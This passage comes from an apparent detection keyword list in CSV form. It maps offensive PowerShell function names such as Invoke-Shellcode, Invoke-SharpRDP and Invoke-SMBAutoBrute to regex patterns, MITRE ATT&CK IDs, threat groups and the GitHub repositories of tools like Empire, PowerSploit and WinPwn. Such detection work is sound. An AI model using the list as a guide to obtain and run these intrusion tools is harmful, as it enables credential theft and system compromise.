tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SharpLdapRelayScan*",".{0,1000}Invoke\-SharpLdapRelayScan.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SharpLdapRelayScan*",".{0,1000}Invoke\-SharpLdapRelayScan.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-Sharplocker*",".{0,1000}Invoke\-Sharplocker.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SharpLoginPrompt*",".{0,1000}Invoke\-SharpLoginPrompt.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SharpMove*",".{0,1000}Invoke\-SharpMove.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SharpPrinter*",".{0,1000}Invoke\-SharpPrinter.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SharpPrinter*",".{0,1000}Invoke\-SharpPrinter.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-SharpPrintNightmare*",".{0,1000}Invoke\-SharpPrintNightmare.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SharpRDP*",".{0,1000}Invoke\-SharpRDP.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SharpRDP*",".{0,1000}Invoke\-SharpRDP.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*Invoke-SharpRDP.ps1*",".{0,1000}Invoke\-SharpRDP\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-SharpRDPTest*",".{0,1000}Invoke\-SharpRDPTest.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*Invoke-SharpSCCM*",".{0,1000}Invoke\-SharpSCCM.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SharpSCCM*",".{0,1000}Invoke\-SharpSCCM.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-SharpSecDump*",".{0,1000}Invoke\-SharpSecDump.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-Sharpshares*",".{0,1000}Invoke\-Sharpshares.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SharpSniper*",".{0,1000}Invoke\-SharpSniper.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SharpSploit*",".{0,1000}Invoke\-SharpSploit.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-Sharpsploit_nomimi*",".{0,1000}Invoke\-Sharpsploit_nomimi.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SharpSSDP*",".{0,1000}Invoke\-SharpSSDP.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SharpStay*",".{0,1000}Invoke\-SharpStay.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SharpUp*",".{0,1000}Invoke\-SharpUp.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SharpUp*",".{0,1000}Invoke\-SharpUp.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-Sharpview*",".{0,1000}Invoke\-Sharpview.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SharpWatson*",".{0,1000}Invoke\-SharpWatson.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-Sharpweb*",".{0,1000}Invoke\-Sharpweb.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-Sharpweb*",".{0,1000}Invoke\-Sharpweb.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-SharpWeb.ps1*",".{0,1000}Invoke\-SharpWeb\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-SharpWSUS*",".{0,1000}Invoke\-SharpWSUS.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-Shellcode -Payload *",".{0,1000}Invoke\-Shellcode\s\-Payload\s.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*Invoke-Shellcode -ProcessId *",".{0,1000}Invoke\-Shellcode\s\-ProcessId\s.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*Invoke-Shellcode -Shellcode *",".{0,1000}Invoke\-Shellcode\s\-Shellcode\s.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*Invoke-Shellcode -Shellcode*",".{0,1000}Invoke\-Shellcode\s\-Shellcode.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","0","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*Invoke-Shellcode*",".{0,1000}Invoke\-Shellcode.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-Shellcode*",".{0,1000}Invoke\-Shellcode.{0,1000}","offensive_tool_keyword","sRDI","Shellcode Reflective DLL Injection - Shellcode implementation of Reflective DLL Injection. Convert DLLs to position independent shellcode","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/monoxgas/sRDI","1","1","N/A","N/A","10","1997","453","2023-11-15T10:53:00Z","2017-07-28T19:30:53Z" "*Invoke-Shellcode*",".{0,1000}Invoke\-Shellcode.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*Invoke-Shellcode.ps1*",".{0,1000}Invoke\-Shellcode\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1139","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-Shellcode.ps1*",".{0,1000}Invoke\-Shellcode\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-Shellcode.ps1*",".{0,1000}Invoke\-Shellcode\.ps1.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-Shellcode.ps1*",".{0,1000}Invoke\-Shellcode\.ps1.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","1","N/A","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*Invoke-ShellcodeMSIL*",".{0,1000}Invoke\-ShellcodeMSIL.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1074","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-ShellCommand*",".{0,1000}Invoke\-ShellCommand.{0,1000}","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1053","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-SlinkyCat*",".{0,1000}Invoke\-SlinkyCat.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","1","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*Invoke-SMBAutoBrute*",".{0,1000}Invoke\-SMBAutoBrute.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Invoke-SMBAutoBrute*",".{0,1000}Invoke\-SMBAutoBrute.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-SMBAutoBrute.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-SMBAutoBrute*",".{0,1000}Invoke\-SMBAutoBrute.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1079","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*invoke-smbclient *",".{0,1000}invoke\-smbclient\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Invoke-SMBClient*",".{0,1000}Invoke\-SMBClient.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-SMBClient.ps1*",".{0,1000}Invoke\-SMBClient\.ps1.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","1","N/A","10","10","1407","299","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" 